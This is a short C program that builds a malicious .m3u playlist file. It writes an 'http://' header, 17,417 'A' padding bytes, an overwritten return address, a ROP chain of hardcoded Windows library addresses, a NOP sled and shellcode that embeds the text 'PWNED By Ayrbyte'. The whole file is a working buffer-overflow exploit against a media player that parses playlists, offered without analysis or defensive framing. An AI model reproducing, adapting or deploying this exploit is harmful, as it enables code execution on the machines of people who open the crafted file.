
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fputs (char*,int *) ;

int main(){
char header[] = "http://";
char buff[] = "\x41";
char eip[] = "\x16\x10\x9c\x7c";
char nop[] = "\x90";

char code[] =
"\xB8\x36\xC6\x0D\x10"
"\xB9\xFF\xFF\xFF\x0F"
"\xBA\xFF\xFF\xFF\x0F"
"\x2B\xC1\x2B\xD1\x52"
"\x50\x90\x90\x90\x90"
"\x90\x50\x90\x90\x90"
"\x90\x52\x90"
"\xE8\xD5\x3E\xCA\x77"

"\x20\x50\x57\x4E\x45\x44\x20\x42\x79\x20\x41\x79"
"\x72\x62\x79\x74\x65\x2E\x2E\x2E\x21\x20\x5E\x5F\x5E";

char rop[] =
"\x41\x41\x41\x41"
"\x42\x02\x9F\x7C"
"\xFF\xFF\xFF\xFF"
"\xD8\x85\xA4\x7C"
"\xAF\xCF\xA4\x7C"
"\xA4\x22\x86\x7C"
"\xCA\x2E\xAE\x7c"
"\xCB\x2E\xAE\x7C"
"\xFE\x2E\xAE\x7C"
"\xCB\x2E\xAE\x7C"
"\x01\x4E\x9E\x7C"
"\x1D\xC9\x91\x7C"
"\x8E\x09\xF3\x77"
"\x65\x82\xA5\x7C";

FILE *teksfile;
teksfile = fopen("c:\\Ayrbyte.m3u", "w");
fputs(header, teksfile);
for(int i=0; i < 17417; i++){fputs(buff, teksfile);}
fputs(eip, teksfile);
fputs(rop, teksfile);
for(int i=0; i < 28; i++){fputs(nop, teksfile);}
fputs(code, teksfile);
fclose(teksfile);
return 0;}
